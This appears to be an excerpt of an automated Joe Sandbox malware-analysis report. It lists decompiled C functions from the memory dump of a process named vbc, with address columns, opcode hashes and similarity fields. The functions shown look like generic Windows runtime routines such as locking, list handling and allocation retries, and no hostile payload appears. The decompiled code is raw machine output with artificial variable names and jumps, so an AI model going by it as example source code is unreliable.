                                                  0x00000000
                                                  0x015ddd7b
                                                  0x015ddd7b
                                                  0x015ddc8f
                                                  0x015ddc8f
                                                  0x015ddc92
                                                  0x015ddc99
                                                  0x015ddc9f
                                                  0x015ddca5
                                                  0x015ddcaa
                                                  0x015ddcaa
                                                  0x015ddcb3
                                                  0x015ddcb8
                                                  0x015ddcbb
                                                  0x015ddcc1
                                                  0x015ddccf
                                                  0x015ddcd2
                                                  0x015ddcd5
                                                  0x015ddcd7
                                                  0x015ddcda
                                                  0x015ddcdc
                                                  0x015ddcdc
                                                  0x015ddce2
                                                  0x015ddce4
                                                  0x00000000
                                                  0x015ddce4

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f60958fbf5ca5c4207a4c3a8d1672668387b34273f067c0001fbf7c65ef7041d
                                                  • Instruction ID: ce1383e044b84efe6781f1381b4b5735e9743e816d5e459799243f87bd6d3d6d
                                                  • Opcode Fuzzy Hash: f60958fbf5ca5c4207a4c3a8d1672668387b34273f067c0001fbf7c65ef7041d
                                                  • Instruction Fuzzy Hash: 3A51B171E01616CFCF24DFACC880AAEBBF5BB88350F248559D955AB384DB34A944CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015CEF40 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E015CEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E015B9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7729c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E015B2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                  0x015cef4b
                                                  0x015cef4d
                                                  0x015cef57
                                                  0x015cf0bd
                                                  0x015cf0c2
                                                  0x015cf0d2
                                                  0x015cf0d2
                                                  0x015cf0c2
                                                  0x015cef5d
                                                  0x015cef5f
                                                  0x015cef67
                                                  0x015cef6a
                                                  0x015cef6d
                                                  0x015cef74
                                                  0x015cef7f
                                                  0x015cef82
                                                  0x015cef82
                                                  0x015cef86
                                                  0x015cef88
                                                  0x015cef8c
                                                  0x015cef8f
                                                  0x015cef8f
                                                  0x015cef8f
                                                  0x00000000
                                                  0x015cef91
                                                  0x015cef93
                                                  0x015cefc4
                                                  0x015cefc4
                                                  0x015cefc4
                                                  0x015cefca
                                                  0x015cefd0
                                                  0x015cf0a6
                                                  0x00000000
                                                  0x00000000
                                                  0x015cf0af
                                                  0x0161bb06
                                                  0x0161bb0a
                                                  0x015cf0b5
                                                  0x015cf0b5
                                                  0x015cf0b5
                                                  0x015cf0b5
                                                  0x00000000
                                                  0x015cefd6
                                                  0x015cefd9
                                                  0x015cf0de
                                                  0x015cf0e2
                                                  0x015cefdf
                                                  0x015cefdf
                                                  0x015cefdf
                                                  0x015cefe5
                                                  0x0161bafc
                                                  0x0161bafc
                                                  0x015cefe5
                                                  0x015cefeb
                                                  0x015cefed
                                                  0x015cf00f
                                                  0x015cf011
                                                  0x015cf01a
                                                  0x015cf01d
                                                  0x015cf021
                                                  0x015cf028
                                                  0x015cf029
                                                  0x015cf029
                                                  0x015cf02c
                                                  0x00000000
                                                  0x015cf02c
                                                  0x015ceff3
                                                  0x015ceff9
                                                  0x015cf0ea
                                                  0x015cf0ed
                                                  0x015cf0ef
                                                  0x00000000
                                                  0x015cf0ef
                                                  0x015cf003
                                                  0x0161bb12
                                                  0x015cf045
                                                  0x015cf049
                                                  0x015cf051
                                                  0x015cf09e
                                                  0x015cf0a0
                                                  0x015cf0a0
                                                  0x015cf09e
                                                  0x015cf053
                                                  0x015cf064
                                                  0x015cf064
                                                  0x015cf06b
                                                  0x0161bb1a
                                                  0x0161bb1a
                                                  0x015cf071
                                                  0x015cf071
                                                  0x015cf07d
                                                  0x015cf082
                                                  0x015cf08f
                                                  0x015cf08f
                                                  0x015cf009
                                                  0x015cf00d
                                                  0x00000000
                                                  0x015cf00d
                                                  0x015cefd0
                                                  0x015cef97
                                                  0x015cefa5
                                                  0x015cefaa
                                                  0x00000000
                                                  0x015cefac
                                                  0x015cefac
                                                  0x015cefac
                                                  0x00000000
                                                  0x015cefb2
                                                  0x015cf036
                                                  0x015cf03a
                                                  0x015cf040
                                                  0x015cf090
                                                  0x00000000
                                                  0x015cf092
                                                  0x015cf042
                                                  0x00000000
                                                  0x015cf042
                                                  0x015cefb7
                                                  0x015cefb9
                                                  0x015cefbc
                                                  0x015cefb0
                                                  0x015cefb0
                                                  0x00000000
                                                  0x015cefbe
                                                  0x015cefbe
                                                  0x015cefc1
                                                  0x00000000
                                                  0x015cefc1
                                                  0x015cefbc
                                                  0x015cefaa
                                                  0x015cef91

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                  • Instruction ID: 0f6ed9296c09b6668b709f242c608d41f7cbdce83456cd8a533b525e8e601e78
                                                  • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                  • Instruction Fuzzy Hash: 4051E530A042469FDB25CFA8C1C17AEBFF2FF05B14F1881ADC5566B282C375A989C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0168740D Relevance: .1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E0168740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0160D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E015FF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L015D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L015D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E015FF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L015D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                  0x0168740d
                                                  0x0168740d
                                                  0x01687412
                                                  0x01687413
                                                  0x01687416
                                                  0x01687418
                                                  0x0168741c
                                                  0x0168741f
                                                  0x01687422
                                                  0x01687422
                                                  0x01687428
                                                  0x0168742a
                                                  0x0168742a
                                                  0x01687451
                                                  0x01687432
                                                  0x0168744f
                                                  0x0168744f
                                                  0x00000000
                                                  0x01687434
                                                  0x01687438
                                                  0x01687443
                                                  0x01687517
                                                  0x01687517
                                                  0x0168751a
                                                  0x01687535
                                                  0x01687520
                                                  0x01687527
                                                  0x0168752c
                                                  0x01687531
                                                  0x01687533
                                                  0x00000000
                                                  0x01687533
                                                  0x00000000
                                                  0x01687531
                                                  0x0168754b
                                                  0x0168754f
                                                  0x0168755c
                                                  0x0168755c
                                                  0x0168755f
                                                  0x01687560
                                                  0x01687561
                                                  0x01687562
                                                  0x01687563
                                                  0x01687568
                                                  0x0168756a
                                                  0x0168756c
                                                  0x0168756d
                                                  0x0168756d
                                                  0x0168756f
                                                  0x01687572
                                                  0x01687574
                                                  0x01687577
                                                  0x0168757c
                                                  0x0168757f
                                                  0x00000000
                                                  0x01687551
                                                  0x01687551
                                                  0x01687551
                                                  0x01687553
                                                  0x01687553
                                                  0x01687449
                                                  0x01687449
                                                  0x0168744c
                                                  0x0168744c
                                                  0x00000000
                                                  0x0168744c
                                                  0x01687443
                                                  0x0168750e
                                                  0x01687514
                                                  0x01687514
                                                  0x01687455
                                                  0x01687469
                                                  0x0168746d
                                                  0x00000000
                                                  0x01687473
                                                  0x01687473
                                                  0x01687476
                                                  0x01687480
                                                  0x01687484
                                                  0x0168748e
                                                  0x01687493
                                                  0x01687493
                                                  0x01687496
                                                  0x01687499
                                                  0x016874a1
                                                  0x016874b1
                                                  0x016874b5
                                                  0x00000000
                                                  0x016874bb
                                                  0x016874c1
                                                  0x016874c1
                                                  0x016874c4
                                                  0x016874c5
                                                  0x016874c6
                                                  0x016874c7
                                                  0x016874c8
                                                  0x016874cd
                                                  0x00000000
                                                  0x016874d3
                                                  0x016874d3
                                                  0x016874d6
                                                  0x016874d8
                                                  0x016874db
                                                  0x016874dd
                                                  0x016874e0
                                                  0x016874e7
                                                  0x016874ee
                                                  0x016874ee
                                                  0x016874f4
                                                  0x016874f9
                                                  0x00000000
                                                  0x016874fb
                                                  0x016874fb
                                                  0x016874fd
                                                  0x01687500
                                                  0x01687503
                                                  0x01687505
                                                  0x01687505
                                                  0x016874f9
                                                  0x00000000
                                                  0x016874cd
                                                  0x016874b5
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                  • Instruction ID: ace5e7095f1e5a19e41f46cc1e878fb1092f6d4bc0befc999a4bf3554a94eae7
                                                  • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                  • Instruction Fuzzy Hash: 0751A071600646EFDB16DF18C880A56BBB5FF45304F24C1AAE908DF252E771EA46CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E2990 Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E015E2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x168ff00);
				E0160D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1591664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E015FE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1591668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E016351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x159166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E015E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E015C6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E015E2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E015CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E015E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E015E2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E015E2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0160D0D1(_t62);
				goto L28;
			}





















                                                  0x015e2990
                                                  0x015e2992
                                                  0x015e2997
                                                  0x015e29a3
                                                  0x015e29a6
                                                  0x015e29ab
                                                  0x015e29ad
                                                  0x015e29b2
                                                  0x01625c80
                                                  0x015e29b8
                                                  0x015e29b8
                                                  0x015e29bb
                                                  0x015e29c0
                                                  0x015e29c5
                                                  0x015e29c6
                                                  0x015e29c6
                                                  0x015e29cb
                                                  0x00000000
                                                  0x00000000
                                                  0x015e29cd
                                                  0x015e29d0
                                                  0x015e29d9
                                                  0x015e29db
                                                  0x015e29dd
                                                  0x015e2a7f
                                                  0x015e2a84
                                                  0x015e2a87
                                                  0x015e2a89
                                                  0x01625ca1
                                                  0x01625ca3
                                                  0x00000000
                                                  0x015e2a8f
                                                  0x015e2a8f
                                                  0x00000000
                                                  0x015e2a8f
                                                  0x00000000
                                                  0x015e29e3
                                                  0x015e29e3
                                                  0x015e29e3
                                                  0x00000000
                                                  0x015e29e3
                                                  0x015e29dd
                                                  0x00000000
                                                  0x015e29db
                                                  0x015e29e6
                                                  0x015e29e9
                                                  0x015e29eb
                                                  0x015e29ed
                                                  0x015e29f3
                                                  0x015e29f5
                                                  0x015e29f8
                                                  0x015e29fa
                                                  0x015e2a97
                                                  0x015e2a9a
                                                  0x015e2a9d
                                                  0x015e2add
                                                  0x00000000
                                                  0x015e2a9f
                                                  0x015e2aa2
                                                  0x015e2aa5
                                                  0x015e2aa8
                                                  0x015e2aab
                                                  0x01625cab
                                                  0x01625caf
                                                  0x01625cc5
                                                  0x01625cda
                                                  0x01625cdc
                                                  0x01625cdf
                                                  0x01625ce5
                                                  0x00000000
                                                  0x01625ceb
                                                  0x01625ced
                                                  0x01625cee
                                                  0x00000000
                                                  0x01625cee
                                                  0x01625cb1
                                                  0x01625cb4
                                                  0x01625cb9
                                                  0x01625cbb
                                                  0x00000000
                                                  0x01625cbd
                                                  0x01625cbd
                                                  0x00000000
                                                  0x01625cbd
                                                  0x01625cbb
                                                  0x015e2ab1
                                                  0x015e2ab1
                                                  0x015e2ac4
                                                  0x015e2ac6
                                                  0x015e2ac6
                                                  0x00000000
                                                  0x015e2ac6
                                                  0x015e2aab
                                                  0x00000000
                                                  0x015e2a00
                                                  0x015e2a09
                                                  0x015e2a0e
                                                  0x015e2a21
                                                  0x015e2a24
                                                  0x015e2a35
                                                  0x015e2a3a
                                                  0x015e2a3d
                                                  0x015e2a42
                                                  0x015e2a59
                                                  0x015e2a59
                                                  0x015e2a5c
                                                  0x015e2a5f
                                                  0x015e2a5f
                                                  0x015e29fa
                                                  0x015e29f3
                                                  0x015e2a64
                                                  0x015e2a64
                                                  0x015e2a6b
                                                  0x015e2a6b
                                                  0x015e2a6d
                                                  0x015e2a72
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e477c15c823255ae627bd8b14718eaba04badc8545d26d54642c4179b58884c4
                                                  • Instruction ID: 1bfd7d7cd30c8e782d0363678e70b05deff67dd2540222c02f59389ec14fb47d
                                                  • Opcode Fuzzy Hash: e477c15c823255ae627bd8b14718eaba04badc8545d26d54642c4179b58884c4
                                                  • Instruction Fuzzy Hash: 80517C71E0021ADFDF29DF99C884ADEBBF9BF48350F048119E905AB254D7B18992CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E4BAD Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E015E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x16ad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E015BCC50(_t86);
					L11:
					return E015FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x16a8504
				E015D2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E015FFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E015FB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L015D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E015BCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x16a8504
								E015CFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E015E4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                  0x015e4bad
                                                  0x015e4bbf
                                                  0x015e4bc2
                                                  0x015e4bc6
                                                  0x015e4bcd
                                                  0x015e4bd9
                                                  0x016267fe
                                                  0x01626800
                                                  0x015e4ccc
                                                  0x015e4ccd
                                                  0x015e4cb7
                                                  0x015e4cc9
                                                  0x015e4cc9
                                                  0x015e4bdf
                                                  0x015e4be5
                                                  0x00000000
                                                  0x00000000
                                                  0x015e4beb
                                                  0x015e4bef
                                                  0x00000000
                                                  0x00000000
                                                  0x015e4bf5
                                                  0x015e4bf9
                                                  0x015e4c06
                                                  0x015e4c0b
                                                  0x015e4c17
                                                  0x015e4c1c
                                                  0x015e4c1f
                                                  0x015e4c25
                                                  0x015e4c33
                                                  0x015e4c3d
                                                  0x015e4c40
                                                  0x015e4c43
                                                  0x015e4c47
                                                  0x015e4c4d
                                                  0x015e4c53
                                                  0x015e4c54
                                                  0x015e4c55
                                                  0x015e4c56
